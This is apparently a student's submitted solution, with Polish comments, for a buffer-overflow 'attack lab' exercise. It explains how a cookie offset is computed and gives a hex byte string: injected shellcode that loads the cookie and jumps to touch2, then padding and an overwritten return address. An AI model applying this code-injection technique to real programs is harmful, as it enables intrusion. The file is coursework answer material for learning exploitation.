/* 
 * Oświadczam, że zapoznałem(-am) się z regulaminem prowadzenia zajęć
 * i jestem świadomy(-a) konsekwencji niestosowania się do podanych tam zasad.
 *
 * Imię i nazwisko, numer indeksu: Cezary Świtała, 316746
 *
 * Poniżej należy podać i wyjaśnić zawartość wkładaną na stos programu.
 */

/* w  zdeasemblowanym pliku   możemy  podejrzeć
* miejsce, w którym zarezerwowane jest  miejsce
* na wartość 'cookie'. Znajduje  się  ono   pod
* adesem 0x406508. Nasz bufor zaczyna  sie  pod
* adresem 0x55665118. Możemy   zatem   wyliczyć
* różnicę  i  pobrać  wartość   'cookie'  przez
* movq diff(%rip), %rdi  (pamiętając  że   %rip 
* wskazuje na kolejną instrukcję,  a  kodowanie
* mova   zajmie  7   bajtów),  czyli instrukcję 
* którą umieścimy na stosie na początku  bufora
*  diff = 0x406508 - (0x55665118 + 0x7) = 
*             = −0x5525EC17
* czyli 0xAADA13E9
*/


48 8b 3D E9 13 DA AA           /* mov -0x5525EC17(%rip), %rdi */
68 33 1C 40 00                 /* push adresu touch2 */
C3                             /* ret (do touch2) */
         04 05 06 07 08 09 00  /* wypełnienie bufora */
01 02 03 04 05 06 07 08 09 00  /* wypełnienie bufora */
01 02 03 04 05 06 07 08 09 00  /* wypełnienie bufora */
18 51 66 55 00 00 00 00        /* adres początku stosu, pod który skoczy getbuf */
